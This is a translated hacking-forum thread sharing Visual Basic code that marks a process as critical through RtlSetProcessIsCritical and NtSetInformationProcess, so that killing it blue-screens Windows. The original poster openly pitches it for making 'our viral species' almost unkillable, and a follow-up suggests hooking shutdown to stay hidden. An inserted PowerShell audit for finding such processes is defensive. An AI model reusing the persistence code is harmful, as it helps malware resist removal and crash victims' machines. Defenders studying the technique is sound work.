Topic: API RtlSetProcessIsCritical (Read 7,154 times)
XcryptOR
Well, this code makes use of a native API from NTDLL.dll which sets our process as a critical system process, just like winlogon or csrss. Well, the result of terminating our process will be the Windows BSOD (Blue Screen Of Death). I hope you find it useful; applying it to our viral species would make our process impossible to terminate. Almost unkillable.

Form code:

'*************************************************************************
'*************************************************************************
' Use of RtlSetProcessIsCritical to set our process as a critical
' system process: the same way as csrss.exe or winlogon
' XcryptOR - Made In Colombia
'**************************************************************************
'*************************************************************************
Private Sub Form_Load()
    On Error Resume Next
    ObtenerPrivilegios SE_DEBUG_NAME          ' obtains debug privileges
    Call RtlSetProcessIsCritical(0, 0, 1)     ' sets our process as a Critical Process
End Sub

Module code:

Option Explicit

Private Const ANYSIZE_ARRAY = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2

Private Type LUID
    LowPart As Long
    HighPart As Long
End Type

Private Type LUID_AND_ATTRIBUTES
    pLuid As LUID
    Attributes As Long
End Type

Private Type TOKEN_PRIVILEGES
    PrivilegeCount As Long
    Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type

Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long

Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege"

' Undocumented ntdll export. It returns an NTSTATUS, so the Declare needs a
' return type (As Long); the original post omitted it.
Public Declare Function RtlSetProcessIsCritical Lib "ntdll.dll" (ByVal NewValue As Boolean, ByVal OldValue As Boolean, ByVal WinLogon As Boolean) As Long

' Enables the named privilege (e.g. SeDebugPrivilege) on the current process token.
' Returns 0 if any step fails, the AdjustTokenPrivileges result otherwise.
Public Function ObtenerPrivilegios(ByVal privilegio As String) As Long
    Dim lpLUID As LUID
    Dim lpToken As TOKEN_PRIVILEGES
    Dim lpAntToken As TOKEN_PRIVILEGES
    Dim hToken As Long
    Dim hProcess As Long
    Dim res As Long

    hProcess = GetCurrentProcess()
    res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
    If res = 0 Then
        Exit Function
    End If

    ' Resolve the privilege name to its LUID on the local system
    res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
    If res = 0 Then
        Exit Function
    End If

    With lpToken
        .PrivilegeCount = 1
        .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
        .Privileges(0).pLuid = lpLUID
    End With

    res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
    If res = 0 Then
        Exit Function
    End If

    ObtenerPrivilegios = res
End Function
Regards

« Last edited: 15 November 2008, 02:10 am by XcryptOR »
carlitrosss6
You know you're right.
Works great, but how could this be reversed? That is, remove the "Critical" privilege from the process?
Regards!
Go Mexico!!
XcryptOR
You know, this API isn't reversible; you should try this code SqUeEzEr made, which is similar to mine. Here you have it, I hope you find it useful.

Public Function MakeCritical(Phandle As Long, Value As Boolean)

If you pass True it will be a critical process, and to revert it call the function with the value False. It's a very good use of the NtSetInformationProcess API; you can hook system shutdown to make your process become non-critical when Windows shuts down. Regards

'Native api NtSetInformationProcess by SqUeEzEr
Option Explicit

Private Const ANYSIZE_ARRAY = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2

Private Type LUID
    LowPart As Long
    HighPart As Long
End Type

Private Type LUID_AND_ATTRIBUTES
    pLuid As LUID
    Attributes As Long
End Type

Private Type TOKEN_PRIVILEGES
    PrivilegeCount As Long
    Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type

Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long

' Standard privilege name constants (only SE_DEBUG_NAME is used below)
Public Const SE_CREATE_TOKEN_NAME As String = "SeCreateTokenPrivilege"
Public Const SE_ASSIGNPRIMARYTOKEN_NAME As String = "SeAssignPrimaryTokenPrivilege"
Public Const SE_LOCK_MEMORY_NAME As String = "SeLockMemoryPrivilege"
Public Const SE_INCREASE_QUOTA_NAME As String = "SeIncreaseQuotaPrivilege"
Public Const SE_UNSOLICITED_INPUT_NAME As String = "SeUnsolicitedInputPrivilege"
Public Const SE_MACHINE_ACCOUNT_NAME As String = "SeMachineAccountPrivilege"
Public Const SE_TCB_NAME As String = "SeTcbPrivilege"
Public Const SE_SECURITY_NAME As String = "SeSecurityPrivilege"
Public Const SE_TAKE_OWNERSHIP_NAME As String = "SeTakeOwnershipPrivilege"
Public Const SE_LOAD_DRIVER_NAME As String = "SeLoadDriverPrivilege"
Public Const SE_SYSTEM_PROFILE_NAME As String = "SeSystemProfilePrivilege"
Public Const SE_SYSTEMTIME_NAME As String = "SeSystemtimePrivilege"
Public Const SE_PROF_SINGLE_PROCESS_NAME As String = "SeProfileSingleProcessPrivilege"
Public Const SE_INC_BASE_PRIORITY_NAME As String = "SeIncreaseBasePriorityPrivilege"
Public Const SE_CREATE_PAGEFILE_NAME As String = "SeCreatePagefilePrivilege"
Public Const SE_CREATE_PERMANENT_NAME As String = "SeCreatePermanentPrivilege"
Public Const SE_BACKUP_NAME As String = "SeBackupPrivilege"
Public Const SE_RESTORE_NAME As String = "SeRestorePrivilege"
Public Const SE_SHUTDOWN_NAME As String = "SeShutdownPrivilege"
Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege"
Public Const SE_AUDIT_NAME As String = "SeAuditPrivilege"
Public Const SE_SYSTEM_ENVIRONMENT_NAME As String = "SeSystemEnvironmentPrivilege"
Public Const SE_CHANGE_NOTIFY_NAME As String = "SeChangeNotifyPrivilege"
Public Const SE_REMOTE_SHUTDOWN_NAME As String = "SeRemoteShutdownPrivilege"

'THE api we need!
' Handle, information class, buffer length and the NTSTATUS return value are all
' 32-bit values, so they are declared As Long (the original post used Integer).
Private Declare Function NtSetInformationProcess Lib "ntdll.dll" (ByVal hProcess As Long, ByVal ProcessInformationClass As Long, ByVal ProcessInformation As Long, ByVal ProcessInformationLength As Long) As Long
Private Const ProcessBreakOnTermination As Long = 29
'The api we need!

' Sets or clears the process "break on termination" flag.
' Any nonzero value enables it; 0 clears it again.
Public Function MakeCritical(Phandle As Long, Value As Boolean)
    GetPrivilegs SE_DEBUG_NAME
    Dim ProcessInfo As Long
    If Value = True Then
        ProcessInfo = 29&
    Else
        ProcessInfo = 0&
    End If
    Call NtSetInformationProcess(Phandle, ProcessBreakOnTermination, VarPtr(ProcessInfo), Len(ProcessInfo))
End Function

' Enables the named privilege on the current process token.
' Returns 0 if any step fails, the AdjustTokenPrivileges result otherwise.
Public Function GetPrivilegs(ByVal privilegio As String) As Long
    Dim lpLUID As LUID
    Dim lpToken As TOKEN_PRIVILEGES
    Dim lpAntToken As TOKEN_PRIVILEGES
    Dim hToken As Long
    Dim hProcess As Long
    Dim res As Long

    hProcess = GetCurrentProcess()
    res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
    If res = 0 Then
        Exit Function
    End If

    res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
    If res = 0 Then
        Exit Function
    End If

    With lpToken
        .PrivilegeCount = 1
        .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
        .Privileges(0).pLuid = lpLUID
    End With

    res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
    If res = 0 Then
        Exit Function
    End If

    GetPrivilegs = res
End Function
« Last edited: 6 June 2009, 04:14 am by XcryptOR »
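From the defender's side, the flag both posts set (RtlSetProcessIsCritical in the first post, NtSetInformationProcess with ProcessBreakOnTermination = 29 in this one) can be read back with NtQueryInformationProcess using the same information class, which is how an analyst finds out whether an unexpected process has been made critical before anyone tries to end it. The following PowerShell audit is an added example, not code from the thread or its authors: it lists every running process whose ProcessBreakOnTermination flag is nonzero. It assumes Windows and an elevated shell; the CriticalAudit class name and the Get-CriticalProcess function are my own, while the OpenProcess, CloseHandle and NtQueryInformationProcess signatures are the standard ones.

```powershell
# Added example (not from the thread): audit which processes carry the
# "break on termination" (critical) flag. Run from an elevated PowerShell.
$signature = @"
using System;
using System.Runtime.InteropServices;
public static class CriticalAudit
{
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(
        IntPtr ProcessHandle, int ProcessInformationClass,
        out uint ProcessInformation, int ProcessInformationLength, out int ReturnLength);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint DesiredAccess, bool InheritHandle, int ProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr Handle);
}
"@
Add-Type -TypeDefinition $signature

$ProcessBreakOnTermination         = 29      # same PROCESSINFOCLASS value the posted code sets
$PROCESS_QUERY_INFORMATION         = 0x0400
$PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

function Get-CriticalProcess {
    foreach ($p in Get-Process) {
        # Try full query access first; protected processes only grant the limited right
        $h = [CriticalAudit]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $p.Id)
        if ($h -eq [IntPtr]::Zero) {
            $h = [CriticalAudit]::OpenProcess($PROCESS_QUERY_LIMITED_INFORMATION, $false, $p.Id)
        }
        if ($h -eq [IntPtr]::Zero) {
            [pscustomobject]@{ Pid = $p.Id; Name = $p.ProcessName; Critical = 'inaccessible' }
            continue
        }
        try {
            [uint32]$flag = 0
            [int]$returned = 0
            $status = [CriticalAudit]::NtQueryInformationProcess(
                $h, $ProcessBreakOnTermination, [ref]$flag, 4, [ref]$returned)
            $state = if ($status -ne 0) {
                'query failed 0x{0:X8}' -f $status     # NTSTATUS, e.g. access denied
            } elseif ($flag -ne 0) {
                'yes'                                   # terminating this process bugchecks the box
            } else {
                'no'
            }
            [pscustomobject]@{ Pid = $p.Id; Name = $p.ProcessName; Critical = $state }
        }
        finally {
            [void][CriticalAudit]::CloseHandle($h)
        }
    }
}

# Show only the interesting rows: critical processes and those we could not check.
Get-CriticalProcess | Where-Object { $_.Critical -ne 'no' } | Format-Table -AutoSize
```

On a clean system the 'yes' rows are the usual set of system processes (smss, csrss, wininit, services, winlogon and similar); any other binary in that list, especially one running from a user-writable path, is the kind of thing the thread's code produces and should be investigated rather than terminated, since ending a critical process triggers a CRITICAL_PROCESS_DIED bug check. Add-Type refuses to redefine the class in a session where it already exists, so re-running the script in the same shell only needs the function part.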
carlitrosss6
You know you're right.
Awesome, thanks XcryptOR!!
Go Mexico!!
Freeze.
I think the ObtenerPrivilegios function is Karcrack's... If so, he should get credit...
Karcrack
Feels watched ¬¬'

> I think the ObtenerPrivilegios function is Karcrack's... If so, he should get credit...

No, it isn't mine... if I remember right it's Nhaalclkiemr's; a pity he hasn't shown up again
Freeze.
Yes, a pity.. He's a great person and an excellent programmer. Could it be that he's still around here in hiding?